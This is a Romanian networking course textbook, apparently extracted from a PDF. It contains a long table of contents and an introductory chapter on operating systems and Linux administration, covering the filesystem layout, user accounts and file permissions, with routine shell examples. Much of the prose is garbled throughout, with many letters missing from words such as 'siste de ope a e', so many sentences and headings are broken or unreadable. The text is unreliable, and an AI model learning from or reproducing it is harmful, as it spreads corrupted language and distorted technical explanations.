Curs Retelistica Automatic A

0 Introducere în sisteme de operare .........................................................................................
1
0.1 Ce este un sistem de operare? ....................................................................................... 1
0.1.1 Ce î sea ă ad i ist a ea u ui siste de ope a e?............................................... 2
0.2 Noţiu i de ază pe t u ad i ist a ea u ui siste de ope a e Li u ............................ 2
0.2.1 Co po e tele u ui siste GNU/Li u . Dist i uţii ................................................... 3
0.2.2 “iste ul de fișie e ..................................................................................................... 3
0.2.3 Gestiunea utilizatorilor .............................................................................................. 4
0.2.4 D eptu i pe siste ul de fișie e .................................................................................. 5
0.2.5 Gestiunea pachetelor ................................................................................................ 6
0.2.6 Gestiunea pachetelor DEB......................................................................................... 7
0.2.7 Gestiunea serviciilor .................................................................................................. 8
0.2.8 Shell scripting ............................................................................................................ 9
0.3 Introducere în Microsoft Windows Server 2008 .......................................................... 12
0.3.1 Despre Microsoft Windows Server 2008 ................................................................. 12
0.3.2 Windows PowerShell ............................................................................................... 13
1 Nivelul fizic............................................................................................................................ 32
1.1 Semnale ........................................................................................................................ 32
1.1.1 Tipuri de semnale .................................................................................................... 32
1.1.2 Codarea ................................................................................................................... 34
1.1.3 Modularea ............................................................................................................... 36
1.1.4 Multiplexarea .......................................................................................................... 37
1.1.5 Caracteristici ale semnalului ................................................................................... 38
1.2 Soluţii de comunicaţie pe cupru ................................................................................... 41
1.2.1 Cablul coaxial........................................................................................................... 41
1.2.2 Cablul torsadat ........................................................................................................ 41
1.3 Soluţii de comunicaţie pe fi ă opti ă .......................................................................... 46
1.3.1 multi-mode .............................................................................................................. 48
1.3.2 single-mode ............................................................................................................. 48
1.3.3 Comparaţie între single- ode şi ulti-mode ......................................................... 48
1.3.4 Mod de construcţie, conectori ................................................................................ 49
1.3.5 Multiple a ea p i di iza ea lu gi ii de u dă – WDM .......................................... 52
1.3.6 Comparaţie între fibra optică şi a lul UTP ............................................................. 53
1.4 Caracteristici ale mediilor de transmisie ...................................................................... 54
1.4.1 Frecvenţa ................................................................................................................. 54
1.4.2 Lăţi ea de a dă .................................................................................................... 54
1.4.3 Unităţi de ăsu ă .................................................................................................... 54
1.4.4 Baseband şi broadband ........................................................................................... 55
1.5 Echipamente de reţea de nivel fizic ............................................................................. 56
1.5.1 Repetorul ................................................................................................................. 56
1.5.2 Convertorul ............................................................................................................. 58
1.6 Studii de caz .................................................................................................................. 58
1.6.1 Realizarea patch-urilor UTP straight-through, crossover, rollover ......................... 58
2 ‘eţele Ethe et..................................................................................................................... 60
2.1 Noţiu i ge e ale ........................................................................................................... 60
2.1.1 Structura cadrului Ethernet..................................................................................... 61
2.1.2 CSMA/CD ................................................................................................................. 62
2.1.3 Full-duplex Ethernet ................................................................................................ 64
2.2 Ethernet switching ....................................................................................................... 65
2.2.1 Î ăţa ea ad eselo ................................................................................................. 66
2.2.2 Deciziile de comutare .............................................................................................. 67
2.2.3 Evitarea buclelor de nivel doi – STP ........................................................................ 68
2.2.4 Metode de comutare .............................................................................................. 73
2.2.5 Switch vs. Bridge ..................................................................................................... 74
ii | ‘ e ţ e l e L o a l e
2.3 ‘eţele lo ale i tuale .................................................................................................... 75

2.3.1 Tipuri de VLAN-uri ................................................................................................... 78
2.3.2 Legătu i a es/t u hi ............................................................................................. 79
2.3.3 Metode de identificare............................................................................................ 79
2.4 Rutare între VLAN-uri ................................................................................................... 82
2.5 Rezumat ........................................................................................................................ 83
2.6 Studiu de caz:................................................................................................................ 84
2.6.1 Comenzi pe switchuri Cisco ..................................................................................... 84
2.6.2 Încapsularea pachetelor: dot1q .............................................................................. 87
2.7 Realizarea unui bridge între conexiuni în Windows Server 2008................................. 89
3 Adresarea IP.......................................................................................................................... 92
3.1 Prezentarea protocolului IP .......................................................................................... 92
3.1.1 Structura antetului IPv4 .......................................................................................... 92
3.1.2 Structura antetului IPv6 .......................................................................................... 94
3.1.3 Clase de adrese........................................................................................................ 95
3.1.4 Mas a de eţea ........................................................................................................ 97
3.1.5 “u eţele ................................................................................................................. 98
3.1.6 Super- eţele............................................................................................................. 99
3.1.7 ARP ........................................................................................................................ 100
3.1.8 DHCP ...................................................................................................................... 105
3.2 Defi i ea pa a et ilo de eţea î Li u .................................................................... 106
3.2.1 Co figu a ea te po a ă........................................................................................ 106
3.2.2 Configurarea per a e tă ..................................................................................... 107
3.3 Configurarea serviciului DHCP pe un server Linux ..................................................... 108
3.3.1 I stala ea şi o figu a ea se e ului DHCP ........................................................... 108
3.3.2 DHCP Relay ............................................................................................................ 110
3.3.3 Exemplu de configurare DHCP .............................................................................. 110
3.4 Configu a ea ad eselo de eţea î Windows Server 2008 ........................................ 112
3.4.1 Network and Sharing Center ................................................................................. 112
3.4.2 Network Connections ............................................................................................ 114
3.4.3 Vizualiza ea pa a et ilo de eţea........................................................................ 116
3.4.4 Co figu a ea a uală a ad eselo IP .................................................................... 118
3.4.5 Defi i ea u ei o figu aţii IP alte ati e .............................................................. 120
3.4.6 Asig a ea auto ată a ad eselo p i ate APIPA .................................................. 121
3.5 Co figu a ea di li ia de o a dă............................................................................. 122
3.5.1 Verificarea unei conexiuni ..................................................................................... 124
3.5.2 Co figu ă i stati e şi di a i e p i PowerShelL ................................................... 126
3.6 Studiu de caz............................................................................................................... 128
4 Rutarea în Internet ............................................................................................................. 132
4.1 Proto oale de uta e şi p oto oale utate.................................................................. 132
4.1.1 Ce este Internetul? ................................................................................................ 132
4.1.2 Tabele de rutare .................................................................................................... 133
4.1.3 Clasificarea rutelor ................................................................................................ 134
4.1.4 Rute statice............................................................................................................ 136
4.2 Protocoale rutate ....................................................................................................... 136
4.3 Protocoale de rutare .................................................................................................. 137
4.3.1 Dete i a ea ăii opti e ..................................................................................... 137
4.3.2 Clasificarea protocoalelor de rutare ..................................................................... 138
4.3.3 Protocoale distance-vector ................................................................................... 138
4.3.4 Protocoale link state.............................................................................................. 139
4.4 Sisteme autonome...................................................................................................... 139
4.4.1 Ce este un sistem autonom? ................................................................................. 139
4.4.2 Protocoale de rutare inter-AS ............................................................................... 140
iii | C u p r i n s
4.5 Co figu ă i la i el de oute î Li u ........................................................................ 141

4.5.1 A ti a ea ută ii ..................................................................................................... 141
4.5.2 Configurarea rutelor.............................................................................................. 142
4.6 NAT - Network Address Translation ........................................................................... 144
4.6.1 Translatarea de adrese în Linux ............................................................................ 146
4.6.2 Alte a ea a a sată a pa hetelo ........................................................................... 147
4.6.3 Tunelare ................................................................................................................ 148
4.6.4 Configurarea tunelului GRE în Linux...................................................................... 149
4.7 Rutarea în Windows Server 2008 ............................................................................... 150
4.7.1 Routing and remote access services ..................................................................... 150
4.8 Studii de caz ................................................................................................................ 157
4.8.1 Încapsularea pachetelor: exemplificare port forwarding ..................................... 157
4.8.2 Încapsularea pachetelor: exemplu de tunelare .................................................... 158
5 Wireless .............................................................................................................................. 162
5.1 I t odu e e î eţele i eless .................................................................................... 162
5.1.1 Introducere în comunicarea wireless .................................................................... 162
5.1.2 Considerente de nivel fizic .................................................................................... 163
5.1.3 “ta da de pe t u eţele lo ale WLANs .............................................................. 165
5.1.4 Wireless MAN ........................................................................................................ 167
5.1.5 I ple e ta ea eţelelo wireless ......................................................................... 167
5.1.6 Comunicarea wireless............................................................................................ 170
5.1.7 Securitatea wireless............................................................................................... 175
5.2 Co figu a ea u ei eţele i eless î Li u – o figu ă i de ază .............................. 176
5.2.1 De ce wireless pe Linux? ........................................................................................ 176
5.2.2 Co figu ă i de ază ............................................................................................... 177
5.3 Co figu a ea u ei eţele i eless î Li u - o figu ă i a a sate ............................. 184
5.3.1 Partajarea unei conexiuni la Internet într-o eţea ad hoc..................................... 184
5.3.2 Co figu ă i de se u itate î wireless ..................................................................... 186
5.4 Wireless în Windows Server 2008 .............................................................................. 191
5.4.1 Activarea serviciului Wireless în Windows Server 2008 ........................................ 191
5.4.2 Configurarea profilurilor wireless.......................................................................... 191
5.4.3 Co e ta ea la o eţea wireless .............................................................................. 192
5.4.4 Managementul conexiunilor wireless ................................................................... 195
5.4.5 Conexiuni wireless ad hoc ..................................................................................... 196
5.5 Ad i ist a ea î li ie de o a dă şi PowerShell ...................................................... 198
5.5.1 Managementul serviciului wireless prin netsh wlan ............................................. 198
5.5.2 Managementul serviciului wireless prin PowerShell ............................................. 202
6 “e u itate şi o ito iza e .................................................................................................. 206
6.1 Secure Shell (SSH) ....................................................................................................... 206
6.1.1 Protocolul SSH ....................................................................................................... 207
6.1.2 Co figu aţii de ază ““H ....................................................................................... 209
6.1.3 Co figu aţii a a sate SSH ..................................................................................... 212
6.2 Firewall ....................................................................................................................... 215
6.2.1 Filtrarea de pachete .............................................................................................. 216
6.2.2 Translatarea de adrese .......................................................................................... 218
6.2.3 Co figu ă i a a sate ipta les ................................................................................ 220
6.3 Captu a e pa hetelo şi a aliza pa hetelo . ID“/IP“. ................................................ 221
6.3.1 Wireshark – o figu ă i de ază ........................................................................... 221
6.3.2 Wireshark – o figu ă i a a sate ......................................................................... 224
6.3.3 Snort – aptu ă de pa hete î li ie de o a dă. ID“/IP“. .................................... 225
6.4 “e u itate şi o ito iza e î Windows Server 2008 .................................................. 230
6.4.1 Windows Firewall with Advanced Security ........................................................... 230
6.4.2 Monitorizare.......................................................................................................... 241
iv | ‘ e ţ e l e L o a l e
7 DNS ..................................................................................................................................... 245

7.1 Protocolul DNS............................................................................................................ 245
7.1.1 Domenii DNS ......................................................................................................... 245
7.1.2 Tipuri de servere DNS ............................................................................................ 247
7.1.3 Tratarea unei cereri DNS ....................................................................................... 249
7.1.4 Structura bazei de date DNS. ................................................................................ 251
7.2 Co figu ă i de ază DN“ ............................................................................................. 253
7.2.1 Configurarea clientului DNS pe Linux .................................................................... 253
7.2.2 Utilitare de interogare DNS ................................................................................... 253
7.2.3 Configurarea serverului DNS – BIND9 ................................................................... 254
7.3 Co figu ă i a a sate DN“ ........................................................................................... 264
7.3.1 Delegarea unui subdomeniu DNS. ........................................................................ 264
7.3.2 Efectuarea DNS load-balancing. ............................................................................ 265
7.3.3 Configurarea DNS Master/Slave............................................................................ 266
7.4 Configurarea unui server DNS pe Windows Server 2008 ........................................... 267
7.4.1 I stala e şi o figu a e .......................................................................................... 268
7.5 Co figu ă i î li ie de o a dă ................................................................................. 278
7.5.1 Fişie ul Hosts ......................................................................................................... 278
7.5.2 Ipconfig .................................................................................................................. 278
7.5.3 Dnscmd .................................................................................................................. 279
7.5.4 Nslookup................................................................................................................ 280
8 E-mail .................................................................................................................................. 283
8.1 A hite tu ă şi fu ţio a e. P oto oale ....................................................................... 284
8.1.1 Fu ţio a ea se i iului de e-mail ........................................................................ 284
8.1.2 Formatul mesajelor ............................................................................................... 286
8.1.3 SMTP (Simple Mail Transfer Protocol) .................................................................. 287
8.1.4 POP3 (Post Office Protocol)................................................................................... 288
8.1.5 IMAP (Internet Message Access Protocol) ............................................................ 289
8.2 Fo atul ăsuţei poştale ............................................................................................ 289
8.2.1 mbox ...................................................................................................................... 289
8.2.2 Maildir ................................................................................................................... 290
8.3 Clie ţi de e-mail .......................................................................................................... 290
8.3.1 mailx ...................................................................................................................... 291
8.4 MTA ............................................................................................................................ 291
8.5 Postfix ......................................................................................................................... 292
8.5.1 A hite tu ă ............................................................................................................ 292
8.5.2 Instalare ................................................................................................................. 292
8.5.3 I te a ţiu ea cu Postfix......................................................................................... 293
8.5.4 Fişie e de o figu a e ............................................................................................ 293
8.5.5 Co figu a e de ază .............................................................................................. 294
8.5.6 Co figu a e utilizato i i tuali şi ăsuţe poştale i tuale ...................................... 296
8.5.7 Co figu a e supo t “A“L şi TL“ .............................................................................. 299
8.6 MDA ............................................................................................................................ 300
8.6.1 Procmail................................................................................................................. 300
8.7 Servere de IMAP ......................................................................................................... 303
8.7.1 Courier IMAP Server .............................................................................................. 303
8.8 Webmail ..................................................................................................................... 305
8.9 Studii de caz ................................................................................................................ 305
8.9.1 Comenzi SMTP. Transmiterea unui mesaj folosind SMTP..................................... 305
8.9.2 Comenzi POP3. Citirea unui mesaj folosind POP3................................................. 306
9 World Wide Web ................................................................................................................ 310
9.1 Modul de fu ţio a e a We -ului .............................................................................. 310
9.1.1 Uniform Resource Locator (URL) ........................................................................... 311
v|Cuprins
9.1.2 Hypertext Transfer Protocol .................................................................................. 311

9.1.3 HyperText Markup Language ................................................................................ 312
9.1.4 Clie ţi e ............................................................................................................. 313
9.1.5 Servere web........................................................................................................... 313
9.2 Apache HTTP Server ................................................................................................... 314
9.2.1 Instalare ................................................................................................................. 315
9.2.2 I te a ţiunea cu serverul web............................................................................... 315
9.2.3 Co figu a e glo ală ............................................................................................... 316
9.2.4 Găzdui e i tuală ................................................................................................... 328
9.3 Configurare suport SSL pentru Apache ...................................................................... 331
9.3.1 Activare modul. Configurare Port ......................................................................... 331
9.3.2 Generare certificat ................................................................................................ 332
9.3.3 Configurare virtual host ........................................................................................ 332
9.4 II“ şi Windows Server 2008...................................................................................... 333
9.4.1 Avantajele lui IIS 7 ................................................................................................. 334
9.4.2 Instalarea IIS 7 ....................................................................................................... 334
9.4.3 I te faţa de ad i ist a e ...................................................................................... 337
9.4.4 Adăuga ea u ui site e ....................................................................................... 339
9.4.5 Configurarea site-urilor ......................................................................................... 341
9.4.6 Securitate .............................................................................................................. 345
9.4.7 C ea ea şi î t eţi e ea ju alelo .......................................................................... 348
9.4.8 Crearea de directoare virtuale .............................................................................. 349
9.4.9 Apli aţie: I teg a ea II“ şi PHP ........................................................................... 350
9.5 IIS 7 – Co figu ă i î li ie de o a dă ....................................................................... 351
10 “e u itatea eţelei .......................................................................................................... 355
10.1 Riscuri de securitate ............................................................................................... 355
10.1.1 P i ipii de ază .................................................................................................. 355
10.1.2 Tipu i de ata u i de eţea .................................................................................... 356
10.1.3 Prevenirea atacurilor ........................................................................................... 364
10.2 Audita ea eţelei..................................................................................................... 365
10.3 Utilita e pe t u asigu a ea se u ităţii .................................................................... 368
10.3.1 Nmap ................................................................................................................... 368
10.3.2 Metasploit ........................................................................................................... 370
10.4 Studii de caz ............................................................................................................ 373
10.4.1 ARP Poisoning...................................................................................................... 373
10.4.2 Firewalking .......................................................................................................... 377
11 Protocoale de nivel transport ......................................................................................... 380
11.1 Noţiu i ge e ale ..................................................................................................... 380
11.2 UDP ......................................................................................................................... 381
11.2.1 Caracteristici UDP ................................................................................................ 381
11.2.2 Formatul datagramelor UDP ............................................................................... 381
11.3 TCP .......................................................................................................................... 382
11.3.1 Caracteristici TCP ................................................................................................. 382
11.3.2 Formatul segmentelor TCP .................................................................................. 383
11.3.3 Co e iu ea şi o u i aţia TCP........................................................................... 384
11.3.4 Controlul fluxului ................................................................................................. 392
11.4 Studiu de caz: Fragmentarea pachetelor UDP ....................................................... 395
12 Anexe .............................................................................................................................. 399
12.1 Anexa 1: Instalare Windows Server 2008 ............................................................... 399
12.2 Anexa 2: Sistemul de boot în Windows Server 2008.............................................. 404
1|Cuprins
0 Introducere în sisteme de operare

O e of the ai ad a tages of U i o e , sa , VM“, is the t e e dous u e of featu es
U i la ks.
Chris Torek
Ce se î vaţă di a est apitol?

 Noţiu ile de ază î ad i ist a ea u ui siste de ope a e
 Administrarea unui sistem Linux
 Noţiu i de ază î shell scripting
 Administrarea unui sistem Windows
 Windows PowerShell
Cine este...
Linus Torvalds este programator fi la dez, u os ut el ai i e a a hite tul şef al
nuceulului Linux (BDFL – Be e ole t Di tato Fo Life . După e a p i it o opie a
sistemului MINIX, a început lucrul la scrierea Linux pentru i386. S-a mutat in Statele Unite
u de susţi e iş a ea Ope Software prin intermediul Linux Foundation. Este angajat al
Ope “ou e De elop e t La s. Dez oltă î o ti ua e ke elul Li u î ad ul o u ităţii
Linux.
Alan Cox este un programator britanic implicat în dezvoltarea nucleul Linux. În timp ce
era angajat la U i e sitatea “ a sea di Ţa a Galilo a i stalat o dist i uţie de Li u î t -o
eţea i te s folosită. A î eput să ezol e u e oase ug-u i şi a es is ap oape i teg al
pa tea de eţea di ke el. A î t eţi ut e siu ea . de Li u , apoi a dez oltat propria
e siu e . . A fost pe t u o ultă e e o side at î ad ul o u ităţii Li u se u dul
lui Li us To alds. Este u pute i susţi ăto î ăit p og a elo f ee/ope -source.
David Miller este un dezvoltator al nucleului Linux implicat la partea de et o ki g şi
SPARC. A portat Linux pe arhitectura Sun Microsystem SPARC, argumentând de ce Linux
e ge ai i e de ât “ola is. Este dez olato ul sti ei TCP/IP di Li u și u ul di p i ipalii
o t i uito i la î u ătăţi ea pe fo aţelo Li u î eţelele cu trafic intens.
Dave Cutler este desig e şi de oltato al siste elo de ope a e de la DEC R“X-11M,
VM“, VAXELN şi de la Mi osoft Wi do s NT . “-a mutat de la DEC la Microsoft pentru a
conduce dezvoltarea Windows NT concentrându-se pe implementarea sistemului de
ope a e pe p o eso ul pe iţi Alpha de la DEC. Dupa dispa iţia DEC, a lu at la po ta ea
Windows pe AMD 64.
0.1 Ce este un sistem de operare?

U siste de ope a e este defi it de o i ei a u set de p og a e a e fa ilitează a esul
utilizatorului la resursele sistemului. Din punct de vedere conceptual sistemul de operare este
ăzut a o abstractizare sau ca o extensie a ași ii fizi e.
Co po e tele p i ipale ale u ui siste de ope a e o plet, așa u este el ăzut de
utilizator, sunt preze tate î figu ă. Cele t ei o po e te su t:
 apli ațiile: programe folosite direct de utilizator pentru rezolvarea unor sarcini specifice; în
a eastă atego ie i t ă suita Office, browser-e, lie ţi de e- ail, apli aţii ulti edia, edii de
dezvoltare integrate etc.
 apli ații de ază: p og a ele folosite î p i ipal pe t u gestiu ea și ad i ist a ea siste ului
sau pe t u a asigu a se ii apli aţiilo de i el î alt; î a eastă atego ie i t ă i te p eto ul de
comenzi, compilatoare, linker-e, biblioteci etc.
2|‘eţele Lo ale
 nucleul sau kernel-ul: o po e ta de ază i i a siste ului de ope a e; o ţi e od a e a

fi rulat în nivelul privilegiat al procesorului (supervisor) cu scopul de intermediere a accesului la
esu sele fizi e ale siste ului și de gestiu e a a esto a; u leul este o po e ta ese ţială a e
sta ilește i elul de pe fo a ţă și de se u itate a siste ului de ope a e.
apli aţii
user space
apli aţii de ază
nucleu
kernel space
0-1: Structura unui sistem de operare
Deși î lu ea siste elo de ope a e e istă o a e di e sitate, âte a siste e de ope a e

au o otă de piaţă și de utiliza e ele a tă. Di pu t de ede e al desti aţiei, siste ele de
operare moderne se împart în sisteme de operare desktop (Windows XP, Ubuntu, Fedora,
Xandros, Mac OS X), sisteme de operare server (Windows 2003 Server, Windows 2008 Server,
Ubuntu Server, RedHat Enterprise Linux și siste e de operare embedded (Windows CE,
Windows Mobile, Symbian, Linux).
Fa iliile de siste e de ope a e u o otă se ifi ati ă î piaţă su t fa ilia Windows,
fa ilia Ma O“, fa ilia GNU/Li u și fa ilia B“D. “iste ul de ope a e u ea ai a e otă pe
piaţa dispoziti elo i teg ate este “ ia .
0.1.1 Ce înseamnă administrarea unui sistem de operare?

Administrarea unui sistem de operare sau system administration se efe ă la a ti ităţile de
i stala e, î t eţi e e și supo t pe t u siste e de al ul de o i ei se e e și o figu a ea
se i iilo pe a e a este siste e le ofe ă. U ad i ist ato de siste este î ge e al o
pe soa ă e deţi e u spe t u la g de u oști ţe teh i e și a ilităţi de o ga iza e și
supe iza e a di e selo a ti ităţi aso iate.
Un administrator de sistem nu este un programator sau inginer software. Deși u
ad i ist ato u p oie tează sau i ple e tează, de o i ei, apli aţii oi, î ţelegerea
di e selo p og a e este e esa ă. De ase e ea, a u ite li aje de p og a a e su t
folosite pe t u auto atiza ea sa i ilo o u e. O e i ţă i po ta tă este î ţelege ea și
i ple e ta ea soluţiilo de se u itate legate de u a fu ţio a e a siste ului.
Î ge e al, u ad i ist ato de siste a e u oști te ap ofu date de scripting care îi
pe it auto atiza ea sa i ilo și o ţi e ea pe iodi ă de i fo aţii.
Di e se o ga izaţii ofe ă t ai i g și e a e e de e tifi a e pe t u ad i ist ato ii de
sistem pentru diverse sisteme de operare: MCSA (Microsoft Certified System Engineer), RHCE
(RedHat Certified Engineer), SCNA (Sun Certified Network Administrator).
0.2 Noţiuni de bază pentru administrarea unui sistem de operare Linux

Cu oști ţele și a ti ităţile e esare pentru adminstrarea unui sistem de operare Linux
sunt similare cu cele necesare pentru orice sistem Unix. Componentele importante sunt
gestiunea dispozitivelor hardware, siste ului de fișie e, gestiu ea utilizato ilo , gestiu ea
3|Cuprins
pachetelor de programe, gestiu ea se i iilo , asigu a ea se u ităţii siste ului, auto atiza ea
sarcinilor.
A eastă a te se a efe i u p edile ţie la gestiu ea se i iilo . Vo fi p eze tate și
i fo aţii utile desp e alte o po e te e esa e.
Majo itatea i te a ţiu ii ad i istratorului de sistem cu sistemul de operare Linux se va
ealiza p i i te ediul i te feţei î li ia de o a dă shell și a fișie elo de o figu a e te t
(cu ajutorul unui editor). Se vor considera a ope ite u oști ţele de ază desp e utiliza ea
interfeţei î li ia de o a dă și edita ea fișie elo de o figu a e.
0.2.1 Componentele unui sistem GNU/Linux. Distribuţii

Un sistem de operare GNU/Linux este compus din nucleul (kernel-ul Li u și apli aţiile e
ulează peste a esta. O u ă pa te di a este apli aţii sunt parte din proiectul GNU1.
U a di t e ele ai i po ta te apli aţii este i te p eto ul de o e zi shell-ul). Shell-ul
i pli it pe ajo itatea dist i uţiilo Li u este Bash. Shell-ul a ţio ează a u i te edia
î t e utilizato și u leu. Shell-ul t a sfo ă o e zile i t oduse de utilizato î p o ese a e
folosesc nucleul pentru realizarea unei sarcini.
Alte apli aţii de ază i po ta te su t editoa e, o pilatoa e, i liote i. Î ge e al
apli aţiile g afi e lipses de pe u siste se e , i te a ţiunea realizându-se aproape exclusiv
prin i te ediul i te feţei î li ie de o a dă.
“p e deose i e de ulte alte siste e de ope a e, dez olta ea u leului și a apli aţiilo se
ealizează dife it. Ag ega ea a esto o po e te se ealizează p i i te ediul u ei dist i uţii
GNU/Li u . E istă sute de dist i uţii Li u , p i t e ele ai u os ute u ă â du-se Ubuntu,
Fedora/RedHat, SuSE, Debian, Gentoo, Slackware etc.
U ele dist i uţii su t si ila e. U astfel de e e plu su t dist i uţiile De ia -based:
Debia , U u tu, MEPI“, Da “ all Li u , Xa d os, Li spi e. A este dist i uţii foloses
pa hetele soft a e puse la dispoziţie de p oie tul De ia a tual e te î u ă de peste
și siste ul APT2 de gestiune a pachetelor.
0.2.2 Sistemul de fișiere

Nucleul Linux ofe ă supo t pe t u u u ă i p esio at de siste e de fișie e. Cu toate
a estea, i te faţa ofe ită utilizato ului este a eeași i dife e t de tipul siste ului de fișie e di
spate. Î ge e al, de u i ile di e selo fișie e și di e toa e su t si ple pe t u a putea fi
folosite efi ie t di li ia de o a dă (/bin, /var, /usr, /lib . Î opoziţie, Ma O“ X folosește
denumiri mai clare (/Library/, /Applications/, /Users/). Separatorul folosit este / (slash).
Majo itatea dist i uţiilo Li u ofe ă o i te faţă o pati ilă u Filesystem Hierarchy
Standard3. FH“ defi ește u ele di e toa elo p i ipale și a o ţi utului a esto a î t -o
dist i uţie Li u . Câte a di i t ă ile i po ta te su t p e izate î ta elul de ai jos:
Director Descriere
/ ‘ădă i a siste ului de fișie e
/bin/ Executabile (binare) asociate comenzilor importante
/dev/ Dispozitive (/dev/null, /dev/hda, /dev/random)
/etc/ Fișie e de o figu a e
1
http://www.gnu.org/
2
http://www.debian.org/doc/manuals/apt-howto/
3
http://www.pathname.com/fhs/
4|‘eţele Lo ale
/home/ Directoarele home ale utilizatorilor

/lib/ Biblioteci
/mnt/ “iste e de fișie e o tate te po ar
/proc/ “iste ul de fișie e procfs
/root/ Home-ul utilizatorului privilegiat (root)
/sbin/ Executabilele comenzilor e e esită d eptu i de utilizato p i ilegiat
/usr/ Ie a hie se u da ă: o ţi e i a e /usr/bin), biblioteci (/usr/lib)
/var/ Fișiere variabile (jurnale, cozi, temporare)
/var/log/ Fișie e de ju aliza e pe t u di e se apli aţii
Co e zile de ază pe t u i te a ţiu ea u siste ul de fișie e su t: pwd, ls, cd, touch, rm,
mkdir, rmdir, cp, mv, link, unlink.
0.2.3 Gestiunea utilizatorilor

Gestiu ea utilizato ilo se efe ă la adăuga ea de oi utilizato i, ște ge ea u ui utilizato
e iste t, odifi a ea i fo aţiilo desp e u utilizato și afișa ea di e selo i fo aţii.
Î siste ele U i , i fo aţiile desp e utilizato i su t eţi ute î fișierul /etc/passwd.
Fie a e li ie di a est fișie o ţi e u ele utilizato ului, ide tifi ato ului său, home-ul, shell-
ul ulat î o e tul aute tifi ă ii și alte i fo aţii de des ie e:
anaconda:~# cat /etc/passwd
andreir:x:1114:1026:Andrei Rizoiu:/home/students/andreir:/bin/bash
alexn:x:1115:1026:Alex Negrea:/home/students/alexn:/bin/bash
[...]
Din motive de securitate, hash-ul aso iat pa olei u se găsește î fișie ul /etc/passwd, ci
î fişie ul /etc/shadow care nu poate fi accesat de majoritatea utilizatorilor:
anaconda:~# ls -l /etc/shadow
-rw-r----- 1 root shadow 7068 2008-09-12 11:59 /etc/shadow
Pe t u a afla i fo aţii desp e u utilizato al siste ului se pot folosi o zile id sau
finger:
anaconda:~# id andreir
uid=1114(andreir) gid=1026(students) groups=1026(students),1037(rl)
anaconda:~# finger alexn
Login: alexn Name: Alex Negrea
Directory: /home/students/alexn Shell: /bin/bash
Never logged in.
No mail.
No Plan.
Utilizatorul privilegiat într-un sistem Unix este utilizatorul root cu uid-ul și home-ul în
/root:
anaconda:~# head -1 /etc/passwd
root:x:0:0:root:/root:/bin/bash
Utilizatorul root (de fapt utilizatorul cu uid-ul 0) are drepturi absolute în cadrul sistemului
și poate ula o i e o a dă. “e e o a dă folosi ea u ui o t ep i ilegiat. Doar atunci când
este nevoie se va folosi contul privilegiat.
“ hi a ea u ui utilizato se ealizează u ajuto ul o e zii su u ată de i t odu e ea
pa olei pe t u a el utilizato . Da ă utilizato ul i iţial este root, u se soli ită i t odu e ea
parolei:
anaconda:~# head -1 /etc/passwd
5|Cuprins
root:x:0:0:root:/root:/bin/bash
anaconda:~# su - andreir
andreir@anaconda:~$ su - razvan
Password:
“iste ele U u tu deza ti ează, de o i ei, utilizato ul root și e o a dă folosi ea

comenzii sudo. Comanda sudo, î p eu ă u fișie ul /etc/sudoers permite rularea de
o e zi p i ilegiate de ăt e u utilizato ep i ilegiat. De o i ei, u utilizato ep i ilegiat
care are drept de sudo va rula comanda sudo bash pe t u a o ţi e u shell cu drepturi
privilegiate.
Schi a ea pa olei u ui utilizato se ealizează u ajuto ul o e zii passwd. Utilizatorul
p i ilegiat poate s hi a pa ola o i ă ui utilizato . U utilizato ep i ilegiat își poate s hi a
pa ola doa sieși:
anaconda:~# passwd guest
Enter new UNIX password:
Retype new UNIX password:
passwd: password updated successfully
În sistemele Debian- ased, adăuga ea, espe ti ște ge ea u ui utilizato se ealizează p i

intermediul scripturilor adduser și deluser:
anaconda:~# adduser test
Adding user `test' ...
Adding new group `test' (1038) ...
Adding new user `test' (1003) with group `test' ...
Creating home directory `/home/test' ...
Copying files from `/etc/skel' ...
Enter new UNIX password:
Retype new UNIX password:
passwd: password updated successfully
Changing the user information for test
Enter the new value, or press ENTER for the default
Full Name []: Test User
Room Number []:
Work Phone []:
Home Phone []:
Other []:
Is the information correct? [y/N] y
anaconda:~# id test
uid=1003(test) gid=1038(test) groups=1038(test)
anaconda:~# deluser --remove-home test
Looking for files to backup/remove ...
Removing files ...
Removing user `test' ...
Done.
A a tajul și, î a elași ti p, deza a tajul folosi ii o e zii adduser este interactivitatea.
Automatizarea sarcinilor presupune comenzi non-interactive. Pentru aceasta, se pot folosi
comenzile useradd, userdel și usermod. useradd, respectiv userdel sunt folosite de
scripturile adduser și deluser.
anaconda:~# useradd -m -d /home/test test
anaconda:~# id test
uid=1116(test) gid=1116(test) groups=1116(test)
anaconda:~# usermod -s /bin/sh test
anaconda:~# userdel -r test
anaconda:~# id test
id: test: No such user
0.2.4 Drepturi pe sistemul de fișiere

T adiţio al, siste ele U i foloses u sistem simplificat de asociere a drepturilor pe o
i t a e î siste ul de fișie e. O i e fișie este deţi ut de u utilizato și u g up. E istă astfel
t ei atego ii de utilizato i: utilizato ul a e deţi e fișie ul user , g upul a e deţi e fișie ul
(group), eilalţi utilizato i others). Prescurtat cele trei categorii sunt denumite ugo.
Fiecare dintre cele trei categorii are trei drepturi posibile: citire (read), scriere (write și
e e uţie execute). Prescurtat cele trei drepturi sunt denumite rwx. Fiecare din cele trei
atego ii de utilizato i poate a ea o i a e și o i âte di ele t ei d eptu i și su t e p i ate de
obicei într-o fo ă li ia ă de o a da ls:
6|‘eţele Lo ale
anaconda:~# ls -l /etc/services
-rw-r--r-- 1 root root 18274 2007-02-02 04:09 /etc/services
anaconda:~# ls -l /var/mail/razvan
-rw-rw---- 1 razvan mail 0 2007-06-19 16:54 /var/mail/razvan
E istă și u e hi ale t i a al d eptu ilo e p i at î o tal. Astfel, ele două fișie e de ai

sus au drepturile 644, respectiv 660 în octal.
Cele trei drepturi de ai sus au se ifi aţii dife ite â d su t folosite peste fișie e sau
directoare, conform tabelului de mai jos:
Drept Efe t fișier Efect director

read Fișie ul poate fi izualizat cat, less) Poate fi izualizat o ţi utul său (ls)
Fișie ul poate fi scris (un editor) sau Pot fi eate/ște se oi i t ă i touch, rm,
write
ște s rm) mkdir, rmdir)
Fișie ul i a sau s ipt poate fi Directorul poate fi parcurs (poate fi parte a

execute
executat u ei ăi
0-2: Drepturile dire toarelor şi fişierelor
“ hi a ea d eptu ilo pe u fișie se ealizează u ajuto ul o e zii chmod. Comanda are

efe t doa da ă este ulată de utilizato ul e deţi e fișie ul:
razvan@anaconda:/tmp$ touch a.txt
razvan@anaconda:/tmp$ ls -l a.txt
-rw-r--r-- 1 razvan razvan 0 Sep 12 17:47 a.txt
razvan@anaconda:/tmp$ chmod a+w a.txt
